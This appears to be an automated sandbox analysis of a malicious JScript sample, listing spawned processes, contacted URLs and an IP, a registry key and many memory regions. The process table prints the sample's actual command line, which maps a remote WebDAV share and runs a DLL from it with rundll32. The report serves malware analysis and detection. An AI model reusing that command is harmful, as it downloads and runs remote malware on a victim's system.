Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10765717746537784.js"
|
 |
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,Entry
|
|
|
|
C:\Windows\System32\net.exe
|
net use \\94.159.113.82@8888\davwwwroot\
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,Entry
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://94.159.113.82:8888/
|
unknown
|
||
|
http://94.159.113.82:8888/n
|
unknown
|
||
|
http://94.159.113.82:8888/#
|
unknown
|
||
|
http://94.159.113.82:8888/3
|
unknown
|
||
|
http://94.159.113.82:8888/o)
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
fp2e7a.wpc.phicdn.net
|
192.229.221.95
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.159.113.82
|
unknown
|
Russian Federation
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1ABF7E58000
|
heap
|
page read and write
|
||
|
1ABF7E2C000
|
heap
|
page read and write
|
||
|
1ABF7E5F000
|
heap
|
page read and write
|
||
|
1C335181000
|
heap
|
page read and write
|
||
|
1C3351F8000
|
heap
|
page read and write
|
||
|
1C3351EA000
|
heap
|
page read and write
|
||
|
1C3351DB000
|
heap
|
page read and write
|
||
|
1C33518D000
|
heap
|
page read and write
|
||
|
1C335557000
|
heap
|
page read and write
|
||
|
1C3357EF000
|
heap
|
page read and write
|
||
|
1C3333C4000
|
heap
|
page read and write
|
||
|
1E34DCA3000
|
heap
|
page read and write
|
||
|
1C335180000
|
heap
|
page read and write
|
||
|
1E34A93C000
|
heap
|
page read and write
|
||
|
1C335170000
|
heap
|
page read and write
|
||
|
1C33517C000
|
heap
|
page read and write
|
||
|
1C3351D0000
|
heap
|
page read and write
|
||
|
1C3334BC000
|
heap
|
page read and write
|
||
|
1C335172000
|
heap
|
page read and write
|
||
|
1C335186000
|
heap
|
page read and write
|
||
|
1ABF7D60000
|
remote allocation
|
page read and write
|
||
|
1C335556000
|
heap
|
page read and write
|
||
|
1E34A907000
|
heap
|
page read and write
|
||
|
1ABF7E2C000
|
heap
|
page read and write
|
||
|
1C3351A5000
|
heap
|
page read and write
|
||
|
1E34ACA5000
|
heap
|
page read and write
|
||
|
1ABF7E27000
|
heap
|
page read and write
|
||
|
1C3351BC000
|
heap
|
page read and write
|
||
|
1C335192000
|
heap
|
page read and write
|
||
|
1C333250000
|
heap
|
page read and write
|
||
|
1C3334B5000
|
heap
|
page read and write
|
||
|
1C335185000
|
heap
|
page read and write
|
||
|
7008BFE000
|
stack
|
page read and write
|
||
|
1ABF7D10000
|
heap
|
page read and write
|
||
|
1ABF7DF0000
|
heap
|
page read and write
|
||
|
1C335198000
|
heap
|
page read and write
|
||
|
1C3351BC000
|
heap
|
page read and write
|
||
|
1C3334BC000
|
heap
|
page read and write
|
||
|
1C3351D1000
|
heap
|
page read and write
|
||
|
1E34A930000
|
heap
|
page read and write
|
||
|
1C3351BC000
|
heap
|
page read and write
|
||
|
1C3351EA000
|
heap
|
page read and write
|
||
|
1C3351EB000
|
heap
|
page read and write
|
||
|
1C3352CD000
|
heap
|
page read and write
|
||
|
1ABF7DD0000
|
heap
|
page read and write
|
||
|
1C3351ED000
|
heap
|
page read and write
|
||
|
1C33518A000
|
heap
|
page read and write
|
||
|
1ABF7E45000
|
heap
|
page read and write
|
||
|
1C33518A000
|
heap
|
page read and write
|
||
|
7008AFE000
|
stack
|
page read and write
|
||
|
1C3351F6000
|
heap
|
page read and write
|
||
|
1C33336F000
|
heap
|
page read and write
|
||
|
1C3333C4000
|
heap
|
page read and write
|
||
|
1C33517A000
|
heap
|
page read and write
|
||
|
7008DFF000
|
stack
|
page read and write
|
||
|
4AA1CFC000
|
stack
|
page read and write
|
||
|
1C3334BA000
|
heap
|
page read and write
|
||
|
1C3351BC000
|
heap
|
page read and write
|
||
|
1ABF7E51000
|
heap
|
page read and write
|
||
|
1C3351B2000
|
heap
|
page read and write
|
||
|
1ABF7E00000
|
heap
|
page read and write
|
||
|
1C335176000
|
heap
|
page read and write
|
||
|
1C33517B000
|
heap
|
page read and write
|
||
|
1C3351BC000
|
heap
|
page read and write
|
||
|
1C3351D8000
|
heap
|
page read and write
|
||
|
1C3351B4000
|
heap
|
page read and write
|
||
|
1C33339A000
|
heap
|
page read and write
|
||
|
1C335172000
|
heap
|
page read and write
|
||
|
1C3351B4000
|
heap
|
page read and write
|
||
|
1C33518A000
|
heap
|
page read and write
|
||
|
4AA19EE000
|
stack
|
page read and write
|
||
|
1E34A8B0000
|
heap
|
page read and write
|
||
|
1ABF7E4B000
|
heap
|
page read and write
|
||
|
1C3333A4000
|
heap
|
page read and write
|
||
|
1E34A890000
|
heap
|
page read and write
|
||
|
1C33518F000
|
heap
|
page read and write
|
||
|
1ABF7E4D000
|
heap
|
page read and write
|
||
|
1C333370000
|
heap
|
page read and write
|
||
|
1C3351E0000
|
heap
|
page read and write
|
||
|
1C3351EA000
|
heap
|
page read and write
|
||
|
1C3333A6000
|
heap
|
page read and write
|
||
|
1C3333A5000
|
heap
|
page read and write
|
||
|
1E34A918000
|
heap
|
page read and write
|
||
|
4AA1D7E000
|
stack
|
page read and write
|
||
|
4AA1C7F000
|
stack
|
page read and write
|
||
|
1C333460000
|
heap
|
page read and write
|
||
|
1C3351EA000
|
heap
|
page read and write
|
||
|
1ABF7D60000
|
remote allocation
|
page read and write
|
||
|
1C33518A000
|
heap
|
page read and write
|
||
|
1E34DCA0000
|
heap
|
page read and write
|
||
|
1C33517A000
|
heap
|
page read and write
|
||
|
1E34E140000
|
trusted library allocation
|
page read and write
|
||
|
1C333348000
|
heap
|
page read and write
|
||
|
1C335182000
|
heap
|
page read and write
|
||
|
1C3351EA000
|
heap
|
page read and write
|
||
|
1C3334B0000
|
heap
|
page read and write
|
||
|
1C3351E9000
|
heap
|
page read and write
|
||
|
1ABF7CF0000
|
heap
|
page read and write
|
||
|
8546BFE000
|
stack
|
page read and write
|
||
|
1ABF7E5F000
|
heap
|
page read and write
|
||
|
1E34ACAB000
|
heap
|
page read and write
|
||
|
1C3333AC000
|
heap
|
page read and write
|
||
|
1ABF7DD5000
|
heap
|
page read and write
|
||
|
1C3334BC000
|
heap
|
page read and write
|
||
|
1C3351E0000
|
heap
|
page read and write
|
||
|
1C33519E000
|
heap
|
page read and write
|
||
|
1C335180000
|
heap
|
page read and write
|
||
|
1C3351BC000
|
heap
|
page read and write
|
||
|
1E34A935000
|
heap
|
page read and write
|
||
|
1C3351C7000
|
heap
|
page read and write
|
||
|
1C33519F000
|
heap
|
page read and write
|
||
|
1C335198000
|
heap
|
page read and write
|
||
|
1C3351AD000
|
heap
|
page read and write
|
||
|
1E34A91F000
|
heap
|
page read and write
|
||
|
1ABF7E25000
|
heap
|
page read and write
|
||
|
1C3351F4000
|
heap
|
page read and write
|
||
|
1C33518B000
|
heap
|
page read and write
|
||
|
1C33517E000
|
heap
|
page read and write
|
||
|
1C3351BC000
|
heap
|
page read and write
|
||
|
1C3351C1000
|
heap
|
page read and write
|
||
|
1C3334BA000
|
heap
|
page read and write
|
||
|
1ABF7DF8000
|
heap
|
page read and write
|
||
|
1C3351A7000
|
heap
|
page read and write
|
||
|
1E34A924000
|
heap
|
page read and write
|
||
|
1E34A925000
|
heap
|
page read and write
|
||
|
1C33519E000
|
heap
|
page read and write
|
||
|
1C3351C6000
|
heap
|
page read and write
|
||
|
1C333398000
|
heap
|
page read and write
|
||
|
1C3334BE000
|
heap
|
page read and write
|
||
|
1C3351EA000
|
heap
|
page read and write
|
||
|
1E34C450000
|
heap
|
page read and write
|
||
|
1E34A91B000
|
heap
|
page read and write
|
||
|
1C3351BC000
|
heap
|
page read and write
|
||
|
1ABF7E58000
|
heap
|
page read and write
|
||
|
1C335197000
|
heap
|
page read and write
|
||
|
1C33519D000
|
heap
|
page read and write
|
||
|
8546C7F000
|
stack
|
page read and write
|
||
|
1C3351BC000
|
heap
|
page read and write
|
||
|
1E34A93C000
|
heap
|
page read and write
|
||
|
1ABF7E25000
|
heap
|
page read and write
|
||
|
1C335171000
|
heap
|
page read and write
|
||
|
7008FFF000
|
stack
|
page read and write
|
||
|
8546B7D000
|
stack
|
page read and write
|
||
|
1C3351E7000
|
heap
|
page read and write
|
||
|
1ABF7D60000
|
remote allocation
|
page read and write
|
||
|
1C3351D0000
|
heap
|
page read and write
|
||
|
1ABF7E52000
|
heap
|
page read and write
|
||
|
1E34ACA0000
|
heap
|
page read and write
|
||
|
1E34A880000
|
heap
|
page read and write
|
||
|
1C335174000
|
heap
|
page read and write
|
||
|
1C3351AF000
|
heap
|
page read and write
|
||
|
1C334E20000
|
heap
|
page read and write
|
||
|
1C3333AD000
|
heap
|
page read and write
|
||
|
1C3351B7000
|
heap
|
page read and write
|
||
|
1ABF7E32000
|
heap
|
page read and write
|
||
|
1C3333A7000
|
heap
|
page read and write
|
||
|
8546AFE000
|
stack
|
page read and write
|
||
|
1C335191000
|
heap
|
page read and write
|
||
|
1C3351EC000
|
heap
|
page read and write
|
||
|
1C3351BC000
|
heap
|
page read and write
|
||
|
1C3357E4000
|
heap
|
page read and write
|
||
|
1E34AC50000
|
heap
|
page read and write
|
||
|
1C33518A000
|
heap
|
page read and write
|
||
|
1C3351BC000
|
heap
|
page read and write
|
||
|
1C33519E000
|
heap
|
page read and write
|
||
|
1C3351EA000
|
heap
|
page read and write
|
||
|
1C3351F4000
|
heap
|
page read and write
|
||
|
4AA196A000
|
stack
|
page read and write
|
||
|
1ABF7E45000
|
heap
|
page read and write
|
||
|
1C3351F4000
|
heap
|
page read and write
|
||
|
1C33336C000
|
heap
|
page read and write
|
||
|
1C3351DD000
|
heap
|
page read and write
|
||
|
70087CA000
|
stack
|
page read and write
|
||
|
1C335189000
|
heap
|
page read and write
|
||
|
1E34A900000
|
heap
|
page read and write
|
||
|
1C3333C4000
|
heap
|
page read and write
|
||
|
70091FE000
|
stack
|
page read and write
|
||
|
1C3351C9000
|
heap
|
page read and write
|
||
|
1ABF7E5F000
|
heap
|
page read and write
|
||
|
1C3333AB000
|
heap
|
page read and write
|
||
|
7008EFE000
|
stack
|
page read and write
|
||
|
70093FB000
|
stack
|
page read and write
|
||
|
1C333440000
|
heap
|
page read and write
|
||
|
70090FE000
|
stack
|
page read and write
|
||
|
1C33518A000
|
heap
|
page read and write
|
||
|
1C3351BF000
|
heap
|
page read and write
|
||
|
1C33517B000
|
heap
|
page read and write
|
||
|
1C3351F7000
|
heap
|
page read and write
|
||
|
1C335BB9000
|
heap
|
page read and write
|
||
|
1C3351D8000
|
heap
|
page read and write
|
||
|
1C33518A000
|
heap
|
page read and write
|
||
|
1C3351FC000
|
heap
|
page read and write
|
||
|
1C3351EA000
|
heap
|
page read and write
|
||
|
1C333340000
|
heap
|
page read and write
|
||
|
1ABF7E1D000
|
heap
|
page read and write
|
||
|
1C3351F9000
|
heap
|
page read and write
|
||
|
1C3351B8000
|
heap
|
page read and write
|
||
|
1ABF7E1D000
|
heap
|
page read and write
|
||
|
1E34A924000
|
heap
|
page read and write
|
||
|
1C3351B8000
|
heap
|
page read and write
|
||
|
1C3351EA000
|
heap
|
page read and write
|
||
|
8546A7A000
|
stack
|
page read and write
|
||
|
1C335177000
|
heap
|
page read and write
|
||
|
1C3333A1000
|
heap
|
page read and write
|
||
|
1C335173000
|
heap
|
page read and write
|
||
|
1C335195000
|
heap
|
page read and write
|
||
|
1C3351F4000
|
heap
|
page read and write
|
||
|
1C3351CF000
|
heap
|
page read and write
|
||
|
1C3351B5000
|
heap
|
page read and write
|
||
|
1C3351BC000
|
heap
|
page read and write
|
||
|
1E34A93C000
|
heap
|
page read and write
|
||
|
1ABF7E58000
|
heap
|
page read and write
|
||
|
1C3334BB000
|
heap
|
page read and write
|
||
|
1C3351F4000
|
heap
|
page read and write
|
||
|
1ABF7C10000
|
heap
|
page read and write
|
There are 205 hidden memdumps, click here to show them.